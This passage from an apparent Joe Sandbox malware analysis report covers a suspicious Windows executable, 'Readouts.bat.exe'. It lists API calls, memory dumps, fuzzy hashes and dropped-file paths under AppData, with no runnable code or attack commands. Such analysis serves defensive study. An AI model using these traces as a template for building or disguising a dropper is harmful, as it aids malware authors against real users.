                                                Download Yara Rule
                                                APIs
                                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 00406148
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: Create
                                                • String ID:
                                                • API String ID: 2289755597-0
                                                • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                • Instruction ID: ca8ad94ba98101b04707ee716b1639a660357d6e221e98cfabfb3f37e80db725
                                                • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                • Instruction Fuzzy Hash: E4E0E67201010DBEDF095F50DD0AD7B371DE704304F01492EFA17D5091E6B5A9305675
                                                Function 00405E2C Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000000,?,004032DC,000000FF,0040CEA0,00000000,0040CEA0,00000000,?,00000004,00000000), ref: 00405E40
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                • Instruction ID: 5c61021ef0a451a09cd551de8c9c857919e5c63ef2f102696365ec0a5e508dbb
                                                • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                • Instruction Fuzzy Hash: A0E08C3220021AABCF10AF54DC00BEB3B6CFB007A0F004432F955E7080D230EA248BE8
                                                Function 00405DFD Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040330E,00000000,00000000,00403165,?,00000004,00000000,00000000,00000000), ref: 00405E11
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                • Instruction ID: 9b1550485fdad5d6ef3d10e0c43d96089a261685836c6268fec650e6d6f6a4c0
                                                • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                • Instruction Fuzzy Hash: D9E08C3220025AABCF109F50EC00EEB3BACEB04360F000433F960E6040D230E9219BE4
                                                Function 73CB2997 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VirtualProtect.KERNELBASE(73CB405C,00000004,00000040,73CB404C), ref: 73CB29B5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1886544437.0000000073CB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 73CB0000, based on PE: true
                                                • Associated: 00000000.00000002.1886512898.0000000073CB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.1886574141.0000000073CB3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.1886592052.0000000073CB5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_73cb0000_Readouts.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 4875b0774adb3786631c67a93cb7bb8f09f236fd49a4e08ad43802c87e10fe40
                                                • Instruction ID: d521ffb1461cae62dd0a23c117361f51cf372de6cfab0e95f7279339432c5343
                                                • Opcode Fuzzy Hash: 4875b0774adb3786631c67a93cb7bb8f09f236fd49a4e08ad43802c87e10fe40
                                                • Instruction Fuzzy Hash: 94F0A5B290C2E0DEC790EF6AA4847053BF0E758304B21452AE1ADDF241F3384C48CF11
                                                Function 004060F1 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,?,?,?,0040617F,?,00000000,?,?,Call,?), ref: 00406115
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                • Instruction ID: 20b5f733041f2f32f375600c7003e80ff03328fe780dbad1ce8753698e77b2b9
                                                • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                • Instruction Fuzzy Hash: 9BD0123204020DBBDF119E909D01FAB376DAB08310F014826FE06A8092D776D530AB54
                                                Function 00404247 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                • Instruction ID: 7bbc1d354ca6a657268cc6ac0e987aef7d9b1e86ba1bc1dada8f70c4162f718e
                                                • Opcode Fuzzy Hash: 01c1f4f33aac3a691bde0469ce369b5b71776cf29dade69a37d66e4d0fb82d37
                                                • Instruction Fuzzy Hash: B6C04C717402016AEA209B519E49F1677545BA0B40F1584797750E50E4C674D450D62C
                                                Function 00403311 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,004030A4,?,?,00000006,00000008,0000000A), ref: 0040331F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                Function 00404230 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(00000028,?,?,0040405B), ref: 0040423E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                • Instruction ID: b613885e7b2bd37cd291f1056477dd360c9db9b8968a6fc02a79c1078c08bd5c
                                                • Opcode Fuzzy Hash: 5ca98cf1e0c0583582b159413f58df588980414c8ed315818e52b16ce3e78aaf
                                                • Instruction Fuzzy Hash: 51B09235280600ABDE214B40DE49F467A62A7B4701F008178B240640B0CAB200A1DB19
                                                Function 0040421D Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                Download Yara Rule
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,00403FF4), ref: 00404227
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                • Instruction ID: cd7a90ca9096364f54c072f0977fd0b21683179c1f8a6313e809ce6865a57a73
                                                • Opcode Fuzzy Hash: 01955649d6a23d6122fd97f0d30e7ef4bb95205b783011211b5c169bc8d67104
                                                • Instruction Fuzzy Hash: AFA01231100400ABCE124F50DF08C09BA31B7B43017104439A1400003086320420EB08

                                                Non-executed Functions

                                                Function 00404C68 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003F9), ref: 00404C80
                                                • GetDlgItem.USER32(?,00000408), ref: 00404C8B
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 00404CD5
                                                • LoadBitmapW.USER32(0000006E), ref: 00404CE8
                                                • SetWindowLongW.USER32(?,000000FC,00405260), ref: 00404D01
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D15
                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404D3D
                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D5B
                                                • DeleteObject.GDI32(00000000), ref: 00404D5E
                                                • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
                                                • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
                                                • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E56
                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
                                                • GetWindowLongW.USER32(?,000000F0), ref: 00404E99
                                                • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA7
                                                • ShowWindow.USER32(?,00000005), ref: 00404EB8
                                                • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040501A
                                                • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 0040502F
                                                • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405053
                                                • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405073
                                                • ImageList_Destroy.COMCTL32(?), ref: 00405088
                                                • GlobalFree.KERNEL32(?), ref: 00405098
                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405111
                                                • SendMessageW.USER32(?,00001102,?,?), ref: 004051BA
                                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004051C9
                                                • InvalidateRect.USER32(?,00000000,?), ref: 004051E9
                                                • ShowWindow.USER32(?,00000000), ref: 00405237
                                                • GetDlgItem.USER32(?,000003FE), ref: 00405242
                                                • ShowWindow.USER32(00000000), ref: 00405249
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                • String ID: $M$N
                                                • API String ID: 1638840714-813528018
                                                • Opcode ID: 7ada3fd627f54f225a0bccf6a3be0b09628748d08562e6c608a90a1b695bedb8
                                                • Instruction ID: eb67e1f84f539b9e971c37d3801f2636e85636a2c3494a43e8d053fef61581d0
                                                • Opcode Fuzzy Hash: 7ada3fd627f54f225a0bccf6a3be0b09628748d08562e6c608a90a1b695bedb8
                                                • Instruction Fuzzy Hash: E6027EB0A00209EFDB209F55CD45AAE7BB9FB44314F10857AF610BA2E1C7799E52CF58
                                                Function 004046EC Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 275stringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetDlgItem.USER32(?,000003FB), ref: 0040473B
                                                • SetWindowTextW.USER32(00000000,?), ref: 00404765
                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404816
                                                • CoTaskMemFree.OLE32(00000000), ref: 00404821
                                                • lstrcmpiW.KERNEL32(Call,004236E8,00000000,?,?), ref: 00404853
                                                • lstrcatW.KERNEL32(?,Call), ref: 0040485F
                                                • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404871
                                                  • Part of subcall function 004058CE: GetDlgItemTextW.USER32(?,?,00000400,004048A8), ref: 004058E1
                                                  • Part of subcall function 00406518: CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Readouts.bat.exe",00403334,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 0040657B
                                                  • Part of subcall function 00406518: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040658A
                                                  • Part of subcall function 00406518: CharNextW.USER32(?,00000000,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Readouts.bat.exe",00403334,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 0040658F
                                                  • Part of subcall function 00406518: CharPrevW.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\Readouts.bat.exe",00403334,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035A3,?,00000006,00000008,0000000A), ref: 004065A2
                                                • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,?,004216B8,?,?,000003FB,?), ref: 00404934
                                                • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040494F
                                                  • Part of subcall function 00404AA8: lstrlenW.KERNEL32(004236E8,004236E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B49
                                                  • Part of subcall function 00404AA8: wsprintfW.USER32 ref: 00404B52
                                                  • Part of subcall function 00404AA8: SetDlgItemTextW.USER32(?,004236E8), ref: 00404B65
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851279445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_Readouts.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness$Call$6B
                                                • API String ID: 2624150263-1157090040
                                                • Opcode ID: b8618f90b922676de7d58afc90790895c774f735f5804d4ec160b51eadca24d3
                                                • Instruction ID: 1fca52776cba06a1556b538b397dade1a16f07a9c9d6655049f3c7fe444e155e
                                                • Opcode Fuzzy Hash: b8618f90b922676de7d58afc90790895c774f735f5804d4ec160b51eadca24d3
                                                • Instruction Fuzzy Hash: B4A180F1A00209ABDB11AFA6CD45AAF77B8EF84714F10843BF601B62D1D77C99418B6D
                                                Function 73CB1B63 Relevance: 20.1, APIs: 13, Instructions: 576stringlibrarymemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 73CB121B: GlobalAlloc.KERNEL32(00000040,?,73CB123B,?,73CB12DF,00000019,73CB11BE,-000000A0), ref: 73CB1225
                                                • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 73CB1C6F
                                                • lstrcpyW.KERNEL32(00000008,?), ref: 73CB1CB7
                                                • lstrcpyW.KERNEL32(00000808,?), ref: 73CB1CC1
                                                • GlobalFree.KERNEL32(00000000), ref: 73CB1CD4
                                                • GlobalFree.KERNEL32(?), ref: 73CB1DB6
                                                • GlobalFree.KERNEL32(?), ref: 73CB1DBB
                                                • GlobalFree.KERNEL32(?), ref: 73CB1DC0
                                                • GlobalFree.KERNEL32(00000000), ref: 73CB1FAA
                                                • lstrcpyW.KERNEL32(?,?), ref: 73CB2144
                                                • GetModuleHandleW.KERNEL32(00000008), ref: 73CB21B9
                                                • LoadLibraryW.KERNEL32(00000008), ref: 73CB21CA
                                                • GetProcAddress.KERNEL32(?,?), ref: 73CB2224
                                                • lstrlenW.KERNEL32(00000808), ref: 73CB223E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1886544437.0000000073CB1000.00000020.00000001.01000000.00000006.sdmp, Offset: 73CB0000, based on PE: true
                                                • Associated: 00000000.00000002.1886512898.0000000073CB0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.1886574141.0000000073CB3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                • Associated: 00000000.00000002.1886592052.0000000073CB5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_73cb0000_Readouts.jbxd
                                                Similarity
                                                • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                • String ID:
                                                • API String ID: 245916457-0
                                                • Opcode ID: f543ba5f869208440635aab2fa1ce13a3c5af58cf896f923c04845f8fc1a1a83
                                                • Instruction ID: 6b6a9cf3f4c1d76c14bee573aa339c65fa54ceb56b044e6125170df684efbb7e
                                                • Opcode Fuzzy Hash: f543ba5f869208440635aab2fa1ce13a3c5af58cf896f923c04845f8fc1a1a83
                                                • Instruction Fuzzy Hash: 1722BA71D0028ADFDB12CFB5C9847EEB7BAFB04355F11452ED1A6EA280D7789A81CB50
                                                Function 00402104 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CoCreateInstance.OLE32(004084DC,?,?,004084CC,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402183
                                                Strings
                                                • C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\vaporarium\immunoassay\overniceness\Cassoon, xrefs: 004021C3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1851121264.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1851104786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851138623.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1851155593.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
